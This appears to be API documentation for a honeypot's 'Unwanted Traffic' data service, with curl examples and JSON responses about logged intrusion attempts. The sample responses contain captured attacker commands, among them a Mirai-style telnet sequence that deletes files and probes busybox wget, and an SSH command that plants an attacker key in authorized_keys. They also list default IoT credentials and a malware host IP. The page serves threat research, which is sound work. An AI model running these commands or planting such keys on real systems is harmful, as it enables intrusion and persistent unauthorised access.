This page documents all available endpoints of the Unwanted Traffic API. Each endpoint requires the X-API-Key header and Accept: application/json header. Rate limits apply: 100 requests/minute for most endpoints, 50 requests/minute for /sessions, /attempts, and /malware.
This is the complete list of endpoints:
The definition of the types of unwanted traffic used throughout the API is as follows:
GET /attempt-credentials
Retrieves a list of unique credentials used in login attempts, with counts of scans and attacks. No pagination.
Query Parameters:
credentials: Filter by specific credentials (format: username||password, URL-encoded).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/attempt-credentialsExample Response:
{
"status": "success",
"data": [
{
"attempt_credentials": "!!Huawei||@HuaweiHgw",
"numberAttacks": "5",
"numberScans": "0"
},
{
"attempt_credentials": "1234||1234",
"numberAttacks": "3",
"numberScans": "0"
}
]
}GET /attempt-credentials/{credentials}
Retrieves details for specific credentials (format: username||password, URL-encoded).
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/attempt-credentials/root%7C%7Cxc3511Example Response:
{
"status": "success",
"data": {
"attempt_credentials": "root||xc3511",
"numberAttacks": "4526",
"numberScans": "0"
}
}GET /attempt-logins
Retrieves counts of successful and failed login attempts. No pagination.
Query Parameters:
login: Filter by login success (true or false).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/attempt-loginsExample Response:
{
"status": "success",
"data": [
{
"attempt_login": "false",
"numberAttacks": "3572",
"numberScans": "0"
},
{
"attempt_login": "true",
"numberAttacks": "4526",
"numberScans": "0"
}
]
}GET /attempt-logins/{login}
Retrieves details for a specific login success value (true or false).
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/attempt-logins/trueExample Response:
{
"status": "success",
"data": {
"attempt_login": "true",
"numberAttacks": "4526",
"numberScans": "0"
}
}GET /attempt-passwords
Retrieves a list of passwords used in login attempts, with counts of scans and attacks. No pagination.
Query Parameters:
password: Filter by specific password (URL-encoded).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/attempt-passwordsExample Response:
{
"status": "success",
"data": [
{
"attempt_password": "xc3511",
"numberAttacks": "4526",
"numberScans": "0"
},
{
"attempt_password": "admin",
"numberAttacks": "187",
"numberScans": "0"
}
]
}GET /attempt-passwords/{password}
Retrieves details for a specific password (URL-encoded).
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/attempt-passwords/xc3511Example Response:
{
"status": "success",
"data": {
"attempt_password": "xc3511",
"numberAttacks": "4526",
"numberScans": "0"
}
}GET /attempt-usernames
Retrieves a list of usernames used in login attempts, with counts of scans and attacks. No pagination.
Query Parameters:
username: Filter by specific username (URL-encoded).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/attempt-usernamesExample Response:
{
"status": "success",
"data": [
{
"attempt_username": "root",
"numberAttacks": "3923",
"numberScans": "0"
},
{
"attempt_username": "admin",
"numberAttacks": "204",
"numberScans": "0"
}
]
}GET /attempt-usernames/{username}
Retrieves details for a specific username (URL-encoded).
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/attempt-usernames/rootExample Response:
{
"status": "success",
"data": {
"attempt_username": "root",
"numberAttacks": "3923",
"numberScans": "0"
}
}GET /attempts
Retrieves a paginated list of login attempts with associated session details. Supports simple and complex filters and pagination.
Query Parameters:
filter: JSON-encoded complex filter (optional).start, end: Timestamp filters (via session).attempt-id, attempt-session, attempt-login, attempt-credentials, attempt-username, attempt-password: Simple filter fields.limit, offset: Pagination parameters.Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/attempts?dst-ip=192.168.0.96&limit=2"Example Response:
{
"status": "success",
"data": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 1,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "2a58f17a436b",
"attempt_username": "root",
"sessions": {
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.23172,
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "2a58f17a436b",
"session_id": 1,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61248,
"timestamp": "Sun, 23 Feb 2025 00:00:01 GMT",
"traffic_type": "attack"
}
},
{
"attempt_credentials": "root||xc3511",
"attempt_id": 2,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "818fa72b39c1",
"attempt_username": "root",
"sessions": {
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.20777,
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "818fa72b39c1",
"session_id": 2,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61254,
"timestamp": "Sun, 23 Feb 2025 00:00:02 GMT",
"traffic_type": "attack"
}
}
],
"pagination": {
"limit": 2,
"offset": 0,
"totalRecords": 8098
}
}GET /attempts/{id}
Retrieves details of a specific login attempt by its ID, including associated session details.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/attempts/1Example Response:
{
"status": "success",
"data": {
"attempt_credentials": "root||xc3511",
"attempt_id": 1,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "2a58f17a436b",
"attempt_username": "root",
"sessions": {
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.23172,
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "2a58f17a436b",
"session_id": 1,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61248,
"timestamp": "Sun, 23 Feb 2025 00:00:01 GMT",
"traffic_type": "attack"
}
}
}GET /commands
Retrieves a list of commands executed during sessions, with counts of scans and attacks. No pagination.
Query Parameters:
command: Filter by command substring (URL-encoded).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/commandsExample Response:
{
"status": "success",
"data": [
{
"commands": "whoami",
"numberAttacks": "13",
"numberScans": "0"
},
{
"commands": "sh; shell; enable; system;",
"numberAttacks": "6850",
"numberScans": "0"
}
]
}GET /commands/{command}
Retrieves details for sessions containing a specific command substring (URL-encoded).
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/commands/whoamiExample Response:
{
"status": "success",
"data": {
"commands": "whoami",
"numberAttacks": "13",
"numberScans": "0"
}
}GET /malware
Retrieves a paginated list of malware records with associated session details. Supports simple and complex filters and pagination.
Query Parameters:
filter: JSON-encoded complex filter (optional).start, end: Timestamp filters (via session).malware-id, malware-session, malware-hash, malware-site, malware-type: Simple filter fields.limit, offset: Pagination parameters.Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/malware?dst-ip=192.168.0.96&limit=2"Example Response:
{
"status": "success",
"data": [
{
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"malware_id": 1,
"malware_session": "82e4335b3bb3",
"malware_site": "",
"malware_type": "redir",
"sessions": {
"commands": "cd ~; chattr -ia .ssh; lockr -ia .ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \\\"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\\\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2722,
"duration": 7.96019,
"protocol": "ssh",
"sensor": "raspberrypi",
"session": "82e4335b3bb3",
"session_id": 666,
"src_asn": 142002,
"src_country": "India",
"src_ip": "192.168.1.100",
"src_port": 51194,
"timestamp": "Sun, 23 Feb 2025 03:03:36 GMT",
"traffic_type": "attack"
}
},
{
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"malware_id": 2,
"malware_session": "c5ebe32322a1",
"malware_site": "",
"malware_type": "redir",
"sessions": {
"commands": "cd ~; chattr -ia .ssh; lockr -ia .ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \\\"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\\\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2722,
"duration": 5.16221,
"protocol": "ssh",
"sensor": "raspberrypi",
"session": "c5ebe32322a1",
"session_id": 744,
"src_asn": 396982,
"src_country": "Taiwan",
"src_ip": "192.168.1.100",
"src_port": 57204,
"timestamp": "Sun, 23 Feb 2025 03:11:28 GMT",
"traffic_type": "attack"
}
}
],
"pagination": {
"limit": 2,
"offset": 0,
"totalRecords": 777
}
}GET /malware/{id}
Retrieves details of a specific malware record by its ID, including associated session details.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/malware/1Example Response:
{
"status": "success",
"data": {
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"malware_id": 1,
"malware_session": "82e4335b3bb3",
"malware_site": "",
"malware_type": "redir",
"sessions": {
"commands": "cd ~; chattr -ia .ssh; lockr -ia .ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \\\"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\\\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2722,
"duration": 7.96019,
"protocol": "ssh",
"sensor": "raspberrypi",
"session": "82e4335b3bb3",
"session_id": 666,
"src_asn": 142002,
"src_country": "India",
"src_ip": "192.168.1.100",
"src_port": 51194,
"timestamp": "Sun, 23 Feb 2025 03:03:36 GMT",
"traffic_type": "attack"
}
}
}GET /malware-hashes
Retrieves a list of malware hashes, with counts of scans and attacks. No pagination.
Query Parameters:
hash: Filter by specific malware hash.Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/malware-hashesExample Response:
{
"status": "success",
"data": [
{
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"numberAttacks": "678",
"numberScans": "0"
}
]
}GET /malware-hashes/{hash}
Retrieves details for a specific malware hash.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/malware-hashes/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2Example Response:
{
"status": "success",
"data": {
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"numberAttacks": "678",
"numberScans": "0"
}
}GET /malware-sites
Retrieves a list of malware sites, with counts of scans and attacks. No pagination.
Query Parameters:
site: Filter by specific malware site (doubly URL-encoded).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/malware-sitesExample Response:
{
"status": "success",
"data": [
{
"malware_site": "http://37.44.238.88",
"numberAttacks": "34",
"numberScans": "0"
}
]
}GET /malware-sites/{site}
Retrieves details for a specific malware site (doubly URL-encoded).
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/malware-sites/http:%252f%252f37.44.238.88"Example Response:
{
"status": "success",
"data": {
"malware_site": "http://37.44.238.88",
"numberAttacks": "34",
"numberScans": "0"
}
}Notice the double URL encoding of the forward slide (%252f): the first decoding pass decodes %25 as %, resuting in %2f; the second pass decodes %2f as /. This is needed to workaround a security restriction in the handling of slashes by the underlying Apache server that hosts the API.
GET /malware-types
Retrieves a list of malware types, with counts of scans and attacks. No pagination.
Query Parameters:
type: Filter by specific malware type.Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/malware-typesExample Response:
{
"status": "success",
"data": [
{
"malware_type": "redir",
"numberAttacks": "678",
"numberScans": "0"
},
{
"malware_type": "download",
"numberAttacks": "39",
"numberScans": "0"
}
]
}GET /malware-types/{type}
Retrieves details for a specific malware type.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/malware-types/redirExample Response:
{
"status": "success",
"data": {
"malware_type": "redir",
"numberAttacks": "678",
"numberScans": "0"
}
}GET /origin-asns
Retrieves a list of source ASNs, with counts of scans and attacks. No pagination.
Query Parameters:
asn: Filter by specific ASN (integer).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/origin-asnsExample Response:
{
"status": "success",
"data": [
{
"src_asn": 4766,
"numberAttacks": "6850",
"numberScans": "0"
}
]
}GET /origin-asns/{asn}
Retrieves details for a specific source ASN.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/origin-asns/4766Example Response:
{
"status": "success",
"data": {
"src_asn": 4766,
"numberAttacks": "6850",
"numberScans": "0"
}
}GET /origin-countries
Retrieves a list of source countries, with counts of scans and attacks. No pagination.
Query Parameters:
country: Filter by specific country (URL-encoded).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/origin-countriesExample Response:
{
"status": "success",
"data": [
{
"src_country": "South Korea",
"numberAttacks": "6850",
"numberScans": "0"
}
]
}GET /origin-countries/{country}
Retrieves details for a specific source country (URL-encoded).
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/origin-countries/South%20KoreaExample Response:
{
"status": "success",
"data": {
"src_country": "South Korea",
"numberAttacks": "6850",
"numberScans": "0"
}
}GET /origin-ips
Retrieves a list of source IP addresses, with counts of scans and attacks. No pagination.
Query Parameters:
ip: Filter by specific IP address.Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/origin-ipsExample Response:
{
"status": "success",
"data": [
{
"src_ip": "192.168.1.100",
"numberAttacks": "7604",
"numberScans": "0"
}
]
}GET /origin-ips/{ip}
Retrieves details for a specific source IP address.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/origin-ips/192.168.1.100Example Response:
{
"status": "success",
"data": {
"src_ip": "192.168.1.100",
"numberAttacks": "7604",
"numberScans": "0"
}
}GET /origin-ports
Retrieves a list of source ports, with counts of scans and attacks. No pagination.
Query Parameters:
port: Filter by specific port (integer).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/origin-portsExample Response:
{
"status": "success",
"data": [
{
"src_port": 61248,
"numberAttacks": "1",
"numberScans": "0"
}
]
}GET /origin-ports/{port}
Retrieves details for a specific source port.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/origin-ports/61248Example Response:
{
"status": "success",
"data": {
"src_port": 61248,
"numberAttacks": "1",
"numberScans": "0"
}
}GET /protocols
Retrieves a list of protocols used for remote access to the honeypot, with counts of scans and attacks. No pagination.
Query Parameters:
protocol: Filter by specific protocol.Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/protocolsExample Response:
{
"status": "success",
"data": [
{
"numberAttacks": "2322655",
"numberScans": "269982",
"protocol": "ssh"
},
{
"numberAttacks": "126208",
"numberScans": "343900",
"protocol": "telnet"
}
]
}GET /protocols/{protocol}
Retrieves details for a specific remote access protocol.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/protocols/sshExample Response:
{
"status": "success",
"data": {
"numberAttacks": "2322655",
"numberScans": "269982",
"protocol": "ssh"
}
}GET /sensors
Retrieves a list of honeypot sensor names, with counts of scans and attacks. No pagination.
Query Parameters:
sensor: Filter by specific sensor.Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/sensorsExample Response:
{
"status": "success",
"data": [
{
"numberAttacks": "2448863",
"numberScans": "613882",
"sensor": "raspberrypi"
}
]
}GET /sensors/{sensor}
Retrieves details for a specific honeypot sensor name.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/sensors/raspberrypiExample Response:
{
"status": "success",
"data": {
"numberAttacks": "2448863",
"numberScans": "613882",
"sensor": "raspberrypy"
}
}GET /sessions
Retrieves a paginated list of sessions with associated attempts and malware. Supports simple and complex filters (see Filters) and pagination (see Pagination).
Query Parameters:
filter: JSON-encoded complex filter (optional).start: Start timestamp (e.g., "2025-02-23T00:00:00Z").end: End timestamp (e.g., "2025-02-23T23:59:59Z").session-id, session, commands, dst-ip, dst-port, dst-asn, dst-country, duration, protocol, sensor, src-ip, src-port, src-asn, src-country, timestamp, traffic-type: Simple filter fields.limit: Number of records to return (default: 50).offset: Number of records to skip (default: 0).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/sessions?dst-ip=192.168.0.96&limit=2"Example Response:
{
"status": "success",
"data": [
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 1,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "2a58f17a436b",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.23172,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "2a58f17a436b",
"session_id": 1,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61248,
"timestamp": "Sun, 23 Feb 2025 00:00:01 GMT",
"traffic_type": "attack"
},
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 2,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "818fa72b39c1",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.20777,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "818fa72b39c1",
"session_id": 2,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61254,
"timestamp": "Sun, 23 Feb 2025 00:00:02 GMT",
"traffic_type": "attack"
}
],
"pagination": {
"limit": 2,
"offset": 0,
"totalRecords": 9607
}
}GET /sessions/{session}
Retrieves details of a specific session by its session ID, including associated attempts and malware.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/sessions/2a58f17a436bExample Response:
{
"status": "success",
"data": {
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 1,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "2a58f17a436b",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.23172,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "2a58f17a436b",
"session_id": 1,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61248,
"timestamp": "Sun, 23 Feb 2025 00:00:01 GMT",
"traffic_type": "attack"
}
}GET /target-asns
Retrieves a list of destination ASNs, with counts of scans and attacks. No pagination.
Query Parameters:
asn: Filter by specific ASN (integer).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/target-asnsExample Response:
{
"status": "success",
"data": [
{
"dst_asn": 7922,
"numberAttacks": "2448863",
"numberScans": "613882"
}
]
}GET /target-asns/{asn}
Retrieves details for a specific destination ASN.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/target-asns/7922Example Response:
{
"status": "success",
"data": {
"dst_asn": 7922,
"numberAttacks": "2448863",
"numberScans": "613882"
}
}GET /target-countries
Retrieves a list of destination countries, with counts of scans and attacks. No pagination.
Query Parameters:
country: Filter by specific country (URL-encoded).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/target-countriesExample Response:
{
"status": "success",
"data": [
{
"dst_country": "United States",
"numberAttacks": "2448863",
"numberScans": "613882"
}
]
}GET /origin-countries/{country}
Retrieves details for a specific destination country (URL-encoded).
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/target-countries/United%20StatesExample Response:
{
"status": "success",
"data": {
"dst_country": "United States",
"numberAttacks": "2448863",
"numberScans": "613882"
}
}GET /target-ips
Retrieves a list of destination IP addresses, with counts of scans and attacks. No pagination.
Query Parameters:
ip: Filter by specific IP address.Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/target-ipsExample Response:
{
"status": "success",
"data": [
{
"dst_ip": "192.168.0.96",
"numberAttacks": "7604",
"numberScans": "2003"
}
]
}GET /target-ips/{ip}
Retrieves details for a specific destination IP address.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/target-ips/192.168.0.96Example Response:
{
"status": "success",
"data": {
"dst_ip": "192.168.0.96",
"numberAttacks": "7604",
"numberScans": "2003"
}
}GET /target-ports
Retrieves a list of destination ports, with counts of scans and attacks. No pagination.
Query Parameters:
port: Filter by specific port (integer).Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/target-portsExample Response:
{
"status": "success",
"data": [
{
"dst_port": 2723,
"numberAttacks": "6850",
"numberScans": "0"
},
{
"dst_port": 2722,
"numberAttacks": "754",
"numberScans": "0"
}
]
}GET /target-ports/{port}
Retrieves details for a specific destination port.
Example Request:
